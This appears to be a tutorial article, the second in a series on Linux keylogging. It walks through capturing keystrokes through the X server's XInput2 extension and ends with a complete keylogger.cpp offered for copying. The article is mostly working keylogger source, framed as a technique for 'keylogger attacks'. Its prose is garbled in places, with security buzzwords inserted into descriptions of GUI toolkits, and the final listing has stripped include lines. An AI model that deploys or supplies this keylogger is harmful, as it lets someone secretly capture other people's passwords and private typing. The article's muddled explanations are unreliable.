24.Key Code Esm W900

In Complete Guide to Keylogging in Linux: Part 1, we discussed how to write keyloggers for Linux by reading keyboard device events. This article will continue to discuss keyboard event capture so you have more techniques to use for keylogger attacks in network security.

What is the Linux GUI Stack?

On Operating Systems (OSes) like Windows, the Graphical User Interface (GUI) is a part of the setup. However, Linux OSes do not have GUI built into them. Instead, a stack of applications, libraries, and protocols manages the GUI. Here is what a generic stack looks like:


    +---------------+                                      +--------------+
    |   Display:2   |<--=---+                    +----=--->|   WxWidget   |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:1   |<--=---+                    +----=--->|      Qt      |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:0   |<--=---+                    +----=--->|     GTK+     |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
                            |                    |                              |
     update   +-------------+--+  ---=---> +-----+--------+   send data         |
    +------=--|    X Server    |           |     xlib     |<-------------=------+
    | screen  +----------------+  <--=---- +--------------+   ask to repaint
    |             ^
    |             | events
    |   +---------+----------------+
    +-->|       Linux Kernel       |
        +--------------------------+
 
 

Within a stack, an X server sits between a GUI and OS while providing various primitives as a part of its responsibilities. The X server implements the "windows, icons, menus, pointer" paradigm in a network-oriented protocol that allows you to draw a screen on a different system from where you run the application. This stack is extensible by design because the GUI network security toolkits use various server libraries and their controls. The GUI network security toolkits (GTK, GTK+, Qt) are found in the "user-friendly" functions, so employees can take these applications and design them according to their own UI needs. Some Desktop Environments with traditional elements and controls (launchers, wallpapers, drag and drop) will run these applications.

What X Server Terminology Should I Know?

Server SecurityLet’s review a few non-intuitive terms that X servers utilize:

  • **display** refers to any X server.
  • **screen** is a virtual framebuffer that associates itself with a display, which can have more than one screen.
  • **monitor** demonstrates where the framebuffer on your physical monitor will be drawn. A screen usually maps with one monitor, but it can also have two monitors on the same screen. These displays can offer a mirror view or a huge screen over two smaller monitors.
  • **root window** is the window where everything is drawn, and it serves as the root node of the window tree.
  • **virtual core device** refers to the mouse and keyboard on a server. These master devices are not dependent on the presence of physical input devices, and they do not generate independent events. Master devices provide core events in a range that matches display resolution and generates device-specific resolution events. Clients receive events once enrolled in XInput Extension, and they can open physical devices directly for non-core events.

How Does Keylogging Work in an X Server?

Here are a few of the basic ways that you can summarize an input capture:

  • Check if the X server is running
  • Enumerate available displays
  • Open desired display
  • Check if XInputExtension is available
  • Set event mask to enable key press and key release events
  • Read events from display in loop

How Can I Enumerate Displays?

When the X server runs, it creates socket files in "/tmp/.X11-unix/" by convention for each display. File names follow common patterns with "X<digits>" while ":<digits>" will be the display name. Enumerate this path and open available displays to ensure each socket file is from your X server. Here is the sample code for enumeration:


std::vector<std::string> EnumerateDisplay()
{
  std::vector<std::string> displays;
 
  for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
  {
    std::string path = p.path().filename().string();
    std::string display_name = ":";
   
    if (path[0] != 'X') continue;
   
    path.erase(0, 1);
    display_name.append(path);
   
    Display *disp = XOpenDisplay(display_name.c_str());
    if (disp != NULL)
    {
      int count = XScreenCount(disp);
      printf("Display %s has %d screens\n",
        display_name.c_str(), count);

      int i;
      for (i=0; i<count; i++)
        printf(" %d: %dx%d\n",
          i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

      XCloseDisplay(disp);
     
      displays.push_back(display_name);
    }
  }
 
  return displays;
}
We can enumerate screens and dimensions for each detected display. In this example, we can see the one screen with 1920x1080 dimensions:
 

Display :0 has 1 screens
 0: 1920x1080
 
 
 

 

How Can I Detect XInputExtension?

Use “XQueryExtension” to see if there are any available extensions on a selected display. Exchanges may change their behavior in the future, so limit use to specific versions where we have tested the code to prevent network security issues. In this example, we will stick with the 2.0 version of XInputExtension for the code snippet:


// Set up X
Display * disp = XOpenDisplay(hostname);
if (NULL == disp)
{
    std::cerr << "Cannot open X display: " << hostname << std::endl;
    exit(1);
}
 
// Test for XInput 2 extension
int xiOpcode, queryEvent, queryError;
if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
{
    std::cerr << "X Input extension not available" << std::endl;
    exit(2);
}
// Request XInput 2.0, guarding against changes in future versions
int major = 2, minor = 0;
int queryResult = XIQueryVersion(disp, &major, &minor);
if (queryResult == BadRequest) 
{
    std::cerr << "Need XI 2.0 support (got " << major << "." << minor << std::endl;
    exit(3);
}
else if (queryResult != Success) 
{
    std::cerr << "Internal error" << std::endl;
    exit(4);
}

How Do I Register for Events?

You will need to use masks and binaries that take the form of (1 << event type). Set a mask to get specific events from an X server so you can see which ones you would be interested in:


typedef struct {
    int deviceid;
    int mask_len;
    unsigned char* mask;
} XIEventMask;
If a device has a valid device ID, the event mask will only be on one device. However, if the device ID detects XIAllDevices or XIAllMasterDevices, the event mask will select all or all the master devices on a system. This bit-wise event mask is effective for dealing with resulting network security threats. The mask_len specifies the bytes of the mask length. Set your mask with the following configurations: 

Window root = DefaultRootWindow(disp);
 
XIEventMask m;
m.deviceid = XIAllMasterDevices;
m.mask_len = XIMaskLen(XI_LASTEVENT);
m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
XISetMask(m.mask, XI_RawKeyPress);
XISetMask(m.mask, XI_RawKeyRelease);
 
XISelectEvents(disp, root, &m, 1);
XSync(disp, false);
free(m.mask); 

How Can I Read Events?

Perform a loop with the following actions so you can read the events. Take an event using "XNextEvent()." Verify the field values to ensure that the event is intended. Here is the code for this loop:


typedef struct {
    int type;
    unsigned long serial;
    Bool send_event;
    Display *display;
    int extension;
    int evtype;
    unsigned int cookie;
    void *data;
} XGenericEventCookie; 

while (true) 
{
    XEvent event;
    XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
    XNextEvent(disp, &event);
 
    if (XGetEventData(disp, cookie) &&
            cookie->type == GenericEvent &&
            cookie->extension == xiOpcode) 
    {
        switch (cookie->evtype)
        {
            case XI_RawKeyRelease:
            case XI_RawKeyPress: 
            {
                XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
                // Ask X what it calls that key
                KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                if (NoSymbol == s) continue;
                char *str = XKeysymToString(s);
                if (NULL == str) continue;
 
                std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                break;
            }
        }
    }
}
 

We don't need to map scan codes within this code, unlike in our previous post, when we had to input the keys manually for keylogger codes. Let the X server do the heavy lifting with applicable keyboard layouts and scan code mapping on current layouts.

What is the Complete Code?

Below is the whole code to copy and use the entire code for experimenting and testing. 

Final Thoughts on Keylogging in Linux

Keylogging on Linux is a helpful way to ensure data and network security on your server. Learn how to implement GUI stacks and X server protocols into your system to improve security posture. Read Part 3 of this series next to learn more about keylogging in Linux.

keylogger.cpp 


#include <X11/XKBlib.h>
#include <X11/extensions/XInput2.h>

#include 

#include 
#include 
#include 
#include 
#include 
 
int printUsage(std::string application_name) 
{
    std::cout << "USAGE: " << application_name << " [-display ] [-enumerate] [-help]" << std::endl;
    std::cout << "display      target X display                   (default :0)" << std::endl;
    std::cout << "enumerate    enumerate all X11 displays" << std::endl;
    std::cout << "help         print this information and exit" << std::endl;
 
    exit(0);
}
 
std::vector EnumerateDisplay()
{
    std::vector displays;
    
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix"))
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        if (path[0] != 'X') continue;
        
        path.erase(0, 1);
        display_name.append(path);
        
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);
 
            int i;
            for (i=0; i<count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));
 
            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}
 
int main(int argc, char * argv[])
{
    const char * hostname    = ":0";
 
    // Get arguments
    for (int i = 1; i < argc; i++)
    {
        if      (!strcmp(argv[i], "-help"))
            printUsage(argv[0]);
        else if (!strcmp(argv[i], "-display"))  
            hostname    = argv[++i];
        else if (!strcmp(argv[i], "-enumerate"))
        {
            EnumerateDisplay();
            return 0;
        }
        else
        { 
            std::cerr << "Unknown argument: " << argv[i] << std::endl;
            printUsage(argv[0]); 
        }
    }
 
    // Set up X
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp)
    {
        std::cerr << "Cannot open X display: " << hostname << std::endl;
        exit(1);
    }
 
    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
    {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    { // Request XInput 2.0, guarding against changes in future versions
        int major = 2, minor = 0;
        int queryResult = XIQueryVersion(disp, &major, &minor);
        if (queryResult == BadRequest) 
        {
            std::cerr << "Need XI 2.0 support (got " << major << "." << minor << std::endl;
            exit(3);
        }
        else if (queryResult != Success) 
        {
            std::cerr << "Internal error" << std::endl;
            exit(4);
        }
    }
 
    // Register events
    Window root = DefaultRootWindow(disp);
    
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;
    m.mask_len = XIMaskLen(XI_LASTEVENT);
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, false);
    free(m.mask);
 
    while (true) 
    {
        XEvent event;
        XGenericEventCookie *cookie = (XGenericEventCookie*)&event.xcookie;
        XNextEvent(disp, &event);
 
        if (XGetEventData(disp, cookie) &&
                cookie->type == GenericEvent &&
                cookie->extension == xiOpcode) 
        {
            switch (cookie->evtype)
            {
                case XI_RawKeyRelease:
                case XI_RawKeyPress: 
                {
                    XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
                    // Ask X what it calls that key
                    KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                    if (NoSymbol == s) continue;
                    char *str = XKeysymToString(s);
                    if (NULL == str) continue;
 
                    std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                    break;
                }
            }
        }
    }